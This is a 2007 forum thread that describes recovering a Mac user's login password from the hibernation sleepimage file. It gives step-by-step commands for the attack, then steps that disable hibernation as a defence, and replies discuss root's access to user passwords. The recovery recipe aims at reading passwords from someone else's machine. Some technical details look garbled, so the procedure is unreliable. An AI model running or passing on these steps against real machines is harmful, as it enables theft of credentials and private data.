EDU: How to get a password from a Mac (and how to prevent it)

Discussion in 'OT Technology' started by mudder, Jun 21, 2007.

  1. mudder

    mudder New Member

    Joined:
    Oct 31, 2004
    Messages:
    1,488
    Likes Received:
    0
    Location:
    ATX
    This post is not for Mac Noobs. This is a very technical EDU with a lengthy intro. How you can use it to get a Mac's passwords is at the end. How you can prevent this (my hack) is also at the end.


    So I got bored the other day and wanted to find out how the new Mac USB police password cracker works. Essentially, it is a USB dongle that reads all keychain passwords without root or admin access. I programmed a USB FPGA capture device from NI to trace all USB activity from and to the USB device. What I found is that when you log in, your password is automatically loaded into RAM as a recent entry. I tried to flush the password out by using all the RAM and then swapping out, but it stays in there. I guess the mac likes having your password in memory.

    So what you do is plug this USB device in and the first thing it does is copy /var/vm/sleepimage 16MB at a time and then searches using Terminal on the USB side (embedded Unix controller) to search for shel/bin/basusername and shel/bin/basshouldunmoun. If it isn't found (the sleepimage is the size of the amount of RAM you have), the next 16MB are copied until it is found. This reference has your password in hex before it. Unix converts it on the fly. Bingo, there's your password. All the dongle has to do at this point is type that in to your keychain through Unix USB push commands and then it can grab the rest of your passwords.

    You can do this yourself in Terminal quite easily, but you'll need another mac to host if you don't have admin access on the machine you're trying to crack.

    1. Open Terminal
    2. Boot unknown password machine into firewire target mode
    3. Plug FWtarget machine into your Mac with known admin password.
    4. Use Blind (application) to reveal all files on Mac
    5. Go to var/vm/ on both your machine and the slave machine
    6. Move the sleepimage from the known password machine to any other folder
    7. Copy the sleepimage from the unknown machine to the known machine in the var/vm directory
    8. In Terminal, type: sudo strings -n 8 /var/vm/sleepimage | grep shel/bin/basusername
    9. The unknown password is returned in a few seconds. It will ask for your password. Enter your known password on the host machine.

    Ok, so that sucks. How do you disable it?

    Well, I tried to use secure virtual memory, but the password in RAM is excluded from the secure virtual memory (otherwise, the Mac would not be able to verify any password you entered without entering that password first, which would make an infinite circle... Essentially the password has to remain unencrypted since it is how the machine verifies any password entry).

    So how do you change this? Well, I just disabled the sleepimage. This is easy:

    1. In Terminal, sudo pmset -a hibernatemode 0; sudo nvram "use-nvramrc?"=false

    2. Restart
    3. rm /var/vm/sleepimage
    4. Then go to security in system preferences and enable secure virtual memory.
    5. Go back to terminal and type: pmset -g | grep hibernatemode
    6. If all went well, the response is hibernate mode 0. If it is instead hibernate mode 3, you messed something up.

    One warning here: Since we just disabled RAM -> HD indexing, if your machine is loses power completely, it will not hibernate (deep sleep). It will just turn off (we removed the HD saved RAM state). This is how all Apples behaved prior to 2005.

    One added benefit: since you are no longer writing RAM data to HD on sleep and restart/shutdown, the machine sleeps, restarts, an shuts down much faster. Real fast. I love it!

    This advice is offered as it. If you do everything right, there is no risk. If you suck at typing or fuck anything up, bad things can happen. Proceed at your own risk!
     
  2. EB

    EB 2/24/08

    Joined:
    May 25, 2006
    Messages:
    22,022
    Likes Received:
    0
    Location:
    TEXAS
    Cool. Little advanced for me though.

    I have used the OS X disc to change the root password though in the lab I used to work in. I always thought it was weird how easy it is to change passwords.
     
  3. mudder

    mudder New Member

    Joined:
    Oct 31, 2004
    Messages:
    1,488
    Likes Received:
    0
    Location:
    ATX
    The thing about this is it will tell you the password. So then you can access locked files, email, disk images, etc. This is of course assuming that the person uses the same password, but 99% of the time people use the same password for everything. That's the real power of it.
     
  4. agent0068

    agent0068 OT Supporter

    Joined:
    Jun 28, 2002
    Messages:
    39,833
    Likes Received:
    0
    (a) "your" hack is not new or novel. googling even shows it being covered in Macworld
    (b) a *much* more trivial approach to breaking and entering a machine you have physical access to is to either:
    * boot off of the system CD
    * or if its a machine likely to still have classic on it, boot into classic
     
  5. Euclid

    Euclid New Member

    Joined:
    Apr 19, 2004
    Messages:
    8,139
    Likes Received:
    0
    Location:
    Nashville, TN
    -rw------T 1 root wheel 2147483648 Jun 21 08:38 sleepimage

    I don't really see what the concern is, if the sleepimage file is only readable by root.
     
  6. agent0068

    agent0068 OT Supporter

    Joined:
    Jun 28, 2002
    Messages:
    39,833
    Likes Received:
    0
    its bad because the root user shouldn't know other user's passwords on the machine
     
  7. Euclid

    Euclid New Member

    Joined:
    Apr 19, 2004
    Messages:
    8,139
    Likes Received:
    0
    Location:
    Nashville, TN
    :hsugh:
     
  8. agent0068

    agent0068 OT Supporter

    Joined:
    Jun 28, 2002
    Messages:
    39,833
    Likes Received:
    0
    do you disagree with that?
     
  9. Dysfnctnl85

    Dysfnctnl85 IT/Apple/Rotary/(D)SLR Crew

    Joined:
    Dec 20, 2004
    Messages:
    3,064
    Likes Received:
    0
    Location:
    Fayetteville, Georgia
    What's wrong with the root user knowing other user's passwords?
     
  10. agent0068

    agent0068 OT Supporter

    Joined:
    Jun 28, 2002
    Messages:
    39,833
    Likes Received:
    0
    then, for instance, the root user could read other user's keychains, probably gaining mail server passwords, safari autofill passwords (e.g. bank accounts), and so on. that would be a very bad thing
     
  11. Dysfnctnl85

    Dysfnctnl85 IT/Apple/Rotary/(D)SLR Crew

    Joined:
    Dec 20, 2004
    Messages:
    3,064
    Likes Received:
    0
    Location:
    Fayetteville, Georgia
    Is that not the point of "root" user? To have control over everything?
     
  12. agent0068

    agent0068 OT Supporter

    Joined:
    Jun 28, 2002
    Messages:
    39,833
    Likes Received:
    0
    good god no.

    control/administration of the machine is not the same as controlling every aspect of the users' use of the machine.

    root is more intended for tasks like software installs, support, maintenance, security, and such tasks involving the upkeep of the machine--sys admin sort of tasks. not for spying or identity theft. properly securing user passwords from prying eyes of the superuser is a step towards ensuring such boundaries are respected.
     
  13. Dysfnctnl85

    Dysfnctnl85 IT/Apple/Rotary/(D)SLR Crew

    Joined:
    Dec 20, 2004
    Messages:
    3,064
    Likes Received:
    0
    Location:
    Fayetteville, Georgia
    Well said, thanks :bigthumb:.
     
  14. IcyHot4Life

    IcyHot4Life Str8 Ballin'

    Joined:
    Aug 2, 2002
    Messages:
    18,151
    Likes Received:
    0
    Location:
    Inquire Within
    well said. agent0068 is the shit :cool: ex-apple too, if i recall correctly...
     
  15. agent0068

    agent0068 OT Supporter

    Joined:
    Jun 28, 2002
    Messages:
    39,833
    Likes Received:
    0
    haha, thanks guys. and yea, sountrack pro :)
     
  16. asshole

    asshole dont eat yellow snow! OT Supporter

    Joined:
    Mar 20, 2005
    Messages:
    1,698
    Likes Received:
    0
    Location:
    everywhere..everyone has an asshole
    edit too much info after reading what i wrote ... you can pm me with questions ive been writing apple code since old school os7 using old crappy apps called resedit and other good ones from codewarrior
     

Share This Page